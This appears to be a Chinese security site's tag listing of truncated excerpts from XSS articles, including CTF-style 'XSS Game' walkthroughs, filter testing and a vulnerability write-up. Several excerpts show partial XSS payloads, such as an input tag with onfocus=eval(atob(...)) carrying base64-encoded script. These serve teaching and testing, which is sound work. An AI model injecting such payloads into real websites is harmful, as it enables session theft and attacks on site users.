autofocus | CN-SEC 中文网

安全文章

【XSS Game】攻防实战全记录

心若有所向往，何惧道阻且长1、Ma Spaghet!审查源码一个不安全的方式，直接get传输somebody输入123看看位置?somebody=123如下用下input标签即可<input o...

12月28日11 views评论

过滤测试尝试插入比较正常的HTML标签，查看标签被过滤情况尝试插入不闭合的标签，查看标签情况然后测试几个XSS的payload，写入常见的几个语句，查看过滤的情况<script>,aler...

12月10日安全文章3 views评论

安全文章

在几个星期以前，我碰到了一个xss 漏洞url: https://target.com/?product_name=test在源码中显示的是<input type="text" name="pr...

01月23日22 views评论

安全文章

12.XSS Game通关教程1、Ma Spaghet!审查源码一个不安全的方式，直接get传输somebody输入123看看位置?somebody=123如下用下input标签即可<input...

02月04日21 views评论

安全文章

Z2O安全攻防 From zero to one 24篇原创内容公众号免责声明本文仅用于技术讨论与学习，利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此...

06月28日88 views已关闭评论

安全文章

Payload："><input onfocus=eval(atob(http://this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCg...

06月07日26 views评论

安全文章

简述XSS攻击通常指的是通过利用网页开发时留下的漏洞，通过巧妙的方法注入恶意指令代码到网页，使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript，但实际上也可以包括Ja...

03月01日312 views评论